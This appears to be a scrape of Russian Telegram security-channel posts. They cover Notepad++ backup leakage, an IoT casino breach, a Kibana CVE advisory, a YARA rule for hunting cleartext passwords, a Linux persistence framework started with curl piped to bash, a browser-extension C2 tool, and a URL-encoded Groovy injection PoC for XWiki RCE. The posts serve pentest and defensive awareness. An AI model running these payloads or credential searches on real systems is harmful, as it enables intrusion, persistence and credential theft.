Fsecurity | HH

Так) надо сюда что-то писать, но когда меняешь архитектуру под капотом сервера, особо ничего не показать... А хотя нет, вот иконки добавил😂😂😂

👨‍💻 Привет! У нас у всех сейчас плотный график работы (ну вы знаете, эти пентесты), поэтому стараемся выкладывать посты, как можем. Сегодня я хочу показать, почему плохо использовать Notepad++ для создания временных пометок. Под капотом он раскидывает информацию из несохраненных вкладок по файлам в %appdata%\notepad++\backup\, а на практике многие забывают удалять конфиденциальную информацию, так и оставив её висеть в файле. На гифке 🔗 PoC (куда же без него?) - стиллер этих файлов Давайте все будем секурными и почистим папку backup 😼 P. S. Я сейчас работаю над одной мега-штукой для канала. Должно получится круто, ждите новостей :)

Привет, похекеры!👋 По просьбам трудящихся 1. Сегодня у нас история о том, как обычный аквариум превратился в джекпот для киберпреступников. Готовы? Поехали! #IoTSecurity #Casino #CyberSecurity #SmartDevices #IoT #Казино ➡️ Рыбки, термометр и база данных В 2017 году неназванное казино в Северной Америке стало жертвой необычной кибератаки. Хакеры проникли в сеть казино через... умный термометр в аквариуме, установленном в лобби. Да-да, вы не ослышались – обычный термометр для рыбок стал ключом к базе данных VIP-клиентов. ➡️Как это работало? ▪️Термометр был подключен к интернету для удаленного мониторинга температуры воды. ▪️Хакеры обнаружили уязвимость в прошивке устройства. ▪️Используя эту уязвимость, они получили доступ к внутренней сети казино. ▪️Найдя базу данных хайроллеров, злоумышленники выгрузили около 10 гигабайт данных. ▪️Информация была передана через тот же термометр на удаленный сервер в Финляндии. ➡️Почему это сработало? ▪️IoT-устройства часто имеют слабую защиту. Почему? Потому что если бы устройство за 5$ имело бы стойкую защиту, оно бы стоило 50$ ▪️Производители фокусируются на функциональности, а не на безопасности. Потому что дешевле не запариваться над безопасностью) ▪️Традиционные системы защиты не всегда покрывают IoT-девайсы. ➡️Последствия Казино потеряло конфиденциальную информацию о своих самых ценных клиентах. А учитывая, что такие клиенты особенно пекутся о конфенданциальности своих походах, то я думаю они не были рады) ➡️Рекомендации ▪️Подключайте к сети только необходимые устройства или грамотно сегментируйте сеть. Термометру, датчику движения или любой другой штуке не нужен доступ к базе данных или кассовому оборудованию. ▪️Смена дефолтных паролей. ▪️Обновление прошивок, даже для "неважных" устройств. p.s. кто заметил отсылку?) 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Еще один SOC инструмент сдырявился следом за вазухом 🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9. Кто подвержен риску? В версиях 8.15.0–8.17.0: пользователи с ролью Viewer. В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors. Рекомендуемые действия: Обновитесь до версии Kibana 8.17.3. Если обновление невозможно, добавьте в конфигурацию Kibana параметр:

xpack.integration_assistant.enabled: false

🐧 Вдогонку к предыдущему посту ➡️https://hadess.io/the-art-of-linux-persistence/ #linux #persistence #redteam ✈️ Pentest HaT

🔗Ссылка: https://habr.com/ru/articles/884840/

S0LD13R - Offensive YARA 😄 🚨 Caution: Use for educational purposes only, author is not responsible for your actions 🚨 В классическом представлении YARA — это инструмент для поиска вредоносных файлов и индикаторов компрометации (IoC). Но в реальности YARA может стать отличным помощником на этапах пентеста и Red Team операций 🕺 T1552.001 Unsecured Credentials: Credentials In Files - техника применяемая для поиска паролей и ключей для получения доступов в различные системы. Пентестер проникает на хост и ищет креды для повышения привилегий или бокового перемещения. Данный этап можно автоматизировать при помощи Yara сигнатур, осуществляя поиск по файлам в директориях и строкам в них 🥂 PoC:

rule ClearTextPasswords_Search_Extended
{
    strings:
        $password1 = "password"
        $password2 = "pwd"
        $password3 = "пароль"
        $password4 = "Password"
        $password6 = "Пароль"

    condition:
        any of them and (filesize < 5MB)
}

Command line 👩‍💻

.\yara64.exe .\rule.yar C:\

Детект 🛡 Регулярный мониторинг на стороне EDR, так как поведение может быть аномальным для хоста и легко обнаруживается. Применять строго в целях тестирования и с разрешения собственника системы @s0ld13r_ch

🛡️ PANIX - Persistence Against *NIX v2.1.0 Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления. Запуск:

curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash

😹 Home #soft #shell #linux #pentest ✈️ Pentest HaT

🔗Ссылка: https://opennet.ru/62836/

#soc Windows Eventlog ID's В данном репозитории собрана полезная информация для аналитиков безопасности в разрезе безопасности корпоративных доменов.

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Когда уложил прод пэйлоадом из ChatGPT

🔗Ссылка: https://www.securitylab.ru/news/557059.php

Специальный фреймворк для потрошения браузеров. Типа "C2" со своим сервером, а агент устанавливается как расширение для браузера. Blog: https://medium.com/@darkrain2009/redext-browser-extension-based-command-control-framework-1eec1402f146 Soft: https://github.com/Darkrain2009/RedExt Возможностей там много, от просмотра данных, до скриншотов и захвата ввода) #c2 #pentest #redteam #creds

В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893 PoC:

<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20

https://github.com/advisories/GHSA-rr6p-3pfg-562j

🔗Ссылка: https://www.securitylab.ru/news/557049.php

🔗Ссылка: https://habr.com/ru/post/852258/